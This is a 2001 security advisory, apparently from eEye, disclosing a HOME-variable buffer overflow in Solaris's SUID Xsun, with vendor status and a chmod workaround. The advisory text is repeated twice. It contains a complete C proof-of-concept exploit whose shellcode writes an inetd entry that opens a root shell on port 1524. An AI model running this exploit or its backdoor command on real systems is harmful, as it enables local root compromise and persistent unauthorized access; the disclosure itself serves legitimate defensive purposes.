Advisories
Solaris Xsun Buffer Overflow Vulnerability
Release Date:
April 10, 2001
Severity:
Local Root Compromise
Vendor:
Sun Microsystems
Systems Affected:
Solaris 7 and Solaris 8 x86 suid vulnerable
Solaris 7 and Solaris 8 Sparc sgid vulnerable
Overview:
Yet some more Solaris spring cleaning...
A buffer overflow was discovered in Xsun. Since Xsun is SUID root, exploiting this vulnerability yields root privileges. The overflow exists in Xsun’s handling of the HOME environment variable.
bash-2.03$ HOME=`perl -e 'print "A"x1050'`
bash-2.03$ /usr/openwin/bin/Xsun :1
Warning: There is no XDISPLAY information for display 1.
Server is using XDISPLAY information for display 0.
Default Font Path: /usr/openwin/lib/X11/
Segmentation Fault (core dumped)
Technical Details:
Proof of Concept:
/***********************************/
Solaris 7 (x86) /usr/openwin/bin/Xsun
HOME environment overflow
Proof of Concept Exploitation
Riley Hassell of eEye Digital Security
Puts a Root shell on local port 1524
/***********************************/
#include
#include
#include
#include
#define BUFLEN 1041
/* seteuid/setuid/inetd shell */
char eyecode[] =
"\xeb\x51\x9a\x65\x65\x79\x65\x07\x90\xc3\x5e"
"\x29\xc0\x89\x46\xab\x88\x46\xb0\x89\x46\x0c"
"\x50\xb0\x8d\xe8\xe4\xff\xff\xff\x29\xc0\x50"
"\xb0\x17\xe8\xda\xff\xff\xff\x29\xc0\x88\x46"
"\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56"
"\x8d\x5e\x10\x89\x1e\x53\x8d\x5e\x18\x89\x5e"
"\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xb2"
"\xff\xff\xff\x90\x90\xc3\xe8\xb2\xff\xff\xff"
"\x90\x6b\x61\x6d\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x2f\x62\x69\x6e\x2f\x73"
"\x68\x20\x2d\x63\x20"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/eeye;"
"/usr/sbin/inetd -s /tmp/eeye2001";
char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;
unsigned long int get_esp()
{__asm__("movl %esp,%eax");}
int main (int argc, char *argv[])
{
int i;
if (argc > 1)
offset = strtol(argv[1], NULL, 0);
else
offset = -200;
esp = get_esp();
memset(buf, 0x90, BUFLEN);
memcpy(buf+800, eyecode, strlen(eyecode));
*((int *) &buf[1037]) = esp+offset;
strncpy(&buf[0],"HOME=",5);
putenv(buf);
execl("/usr/openwin/bin/Xsun", "eEye", ":1",NULL);
return;
}
Vendor Status:
Sun Microsystems has been contacted. They are currently working on patches for this and other related vulnerabilities eEye has discovered. We would like to thank them for working with us on creating a patch for this vulnerability.
Workaround:
chmod –s /usr/openwin/bin/Xsun
This will remove the setuid bit from Xsun, therefore if someone does exploit this vulnerability, they won’t gain higher privileges.
Credit:
Riley Hassell
Greetings:
ADM, Lamagra, Zen-Parse, and Speakeasy Networks
Copyright (c) 1998-2009 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
April 10, 2001
Severity:
Local Root Compromise
Vendor:
Sun Microsystems
Systems Affected:
Solaris 7 and Solaris 8 x86 suid vulnerable
Solaris 7 and Solaris 8 Sparc sgid vulnerable
Overview:
Yet some more Solaris spring cleaning...
A buffer overflow was discovered in Xsun. Since Xsun is SUID root, exploiting this vulnerability yields root privileges. The overflow exists in Xsun’s handling of the HOME environment variable.
bash-2.03$ HOME=`perl -e 'print "A"x1050'`
bash-2.03$ /usr/openwin/bin/Xsun :1
Warning: There is no XDISPLAY information for display 1.
Server is using XDISPLAY information for display 0.
Default Font Path: /usr/openwin/lib/X11/
Segmentation Fault (core dumped)
Technical Details:
Proof of Concept:
/***********************************/
Solaris 7 (x86) /usr/openwin/bin/Xsun
HOME environment overflow
Proof of Concept Exploitation
Riley Hassell of eEye Digital Security
Puts a Root shell on local port 1524
/***********************************/
#include
#include
#include
#include
#define BUFLEN 1041
/* seteuid/setuid/inetd shell */
char eyecode[] =
"\xeb\x51\x9a\x65\x65\x79\x65\x07\x90\xc3\x5e"
"\x29\xc0\x89\x46\xab\x88\x46\xb0\x89\x46\x0c"
"\x50\xb0\x8d\xe8\xe4\xff\xff\xff\x29\xc0\x50"
"\xb0\x17\xe8\xda\xff\xff\xff\x29\xc0\x88\x46"
"\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56"
"\x8d\x5e\x10\x89\x1e\x53\x8d\x5e\x18\x89\x5e"
"\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xb2"
"\xff\xff\xff\x90\x90\xc3\xe8\xb2\xff\xff\xff"
"\x90\x6b\x61\x6d\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x2f\x62\x69\x6e\x2f\x73"
"\x68\x20\x2d\x63\x20"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/eeye;"
"/usr/sbin/inetd -s /tmp/eeye2001";
char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;
unsigned long int get_esp()
{__asm__("movl %esp,%eax");}
int main (int argc, char *argv[])
{
int i;
if (argc > 1)
offset = strtol(argv[1], NULL, 0);
else
offset = -200;
esp = get_esp();
memset(buf, 0x90, BUFLEN);
memcpy(buf+800, eyecode, strlen(eyecode));
*((int *) &buf[1037]) = esp+offset;
strncpy(&buf[0],"HOME=",5);
putenv(buf);
execl("/usr/openwin/bin/Xsun", "eEye", ":1",NULL);
return;
}
Vendor Status:
Sun Microsystems has been contacted. They are currently working on patches for this and other related vulnerabilities eEye has discovered. We would like to thank them for working with us on creating a patch for this vulnerability.
Workaround:
chmod –s /usr/openwin/bin/Xsun
This will remove the setuid bit from Xsun, therefore if someone does exploit this vulnerability, they won’t gain higher privileges.
Credit:
Riley Hassell
Greetings:
ADM, Lamagra, Zen-Parse, and Speakeasy Networks
Copyright (c) 1998-2009 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
